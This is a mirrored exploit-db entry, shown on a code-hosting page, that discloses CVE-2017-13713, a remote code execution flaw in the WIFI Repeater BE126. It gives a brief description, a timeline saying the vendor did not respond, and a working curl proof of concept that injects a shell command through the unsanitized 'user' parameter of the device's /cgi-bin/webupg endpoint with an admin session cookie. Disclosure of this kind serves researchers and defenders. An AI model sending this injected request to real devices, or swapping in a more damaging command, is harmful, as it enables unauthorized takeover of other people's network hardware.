bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/webapps/42608.txt
Offensive Security d304cc3d3e DB: 2017-11-24 
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

33 lines
No EOL
1 KiB
Text
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: WIFI Repeater BE126 Remote Code Execution
# Date Publish: 09/09/2017
# Exploit Authors: Hay Mizrachi, Omer Kaspi
# Contact: haymizrachi@gmail.com, komerk0@gmail.com
# Vendor Homepage: http://www.twsz.com
# Category: Webapps
# Version: 1.0
# Tested on: Windows/Ubuntu 16.04
# CVE: CVE-2017-13713
1 - Description:
HTTP POST request that contains user parmater which can give us to run
Remote Code Execution to the device.
The parameter is not sanitized at all, which cause him to be vulnerable.
2 - Proof of Concept:
curl -d "name=HTTP&url="http://www.test.com&user=;echo hacked!! >
/var/mycode;&password=a&port=8&dir=a"
--cookie "Cookie: sessionsid=XXXXX; auth=ok expires=Sun, 15-May-2112
01:45:46 GMT; langmanulset=yes;
sys_UserName=admin; expires=Mon, 31-Jan-2112 16:00:00 GMT; language=en_us"
-X POST http://beconnected.client/cgi-bin/webupg
3 - Timeline:
29/4/2017 Vulnerability Discovered.
29/4/2017 - Vendor not responding.
03/09/2017 Exploit published.
Reference in a new issue View git blame Copy permalink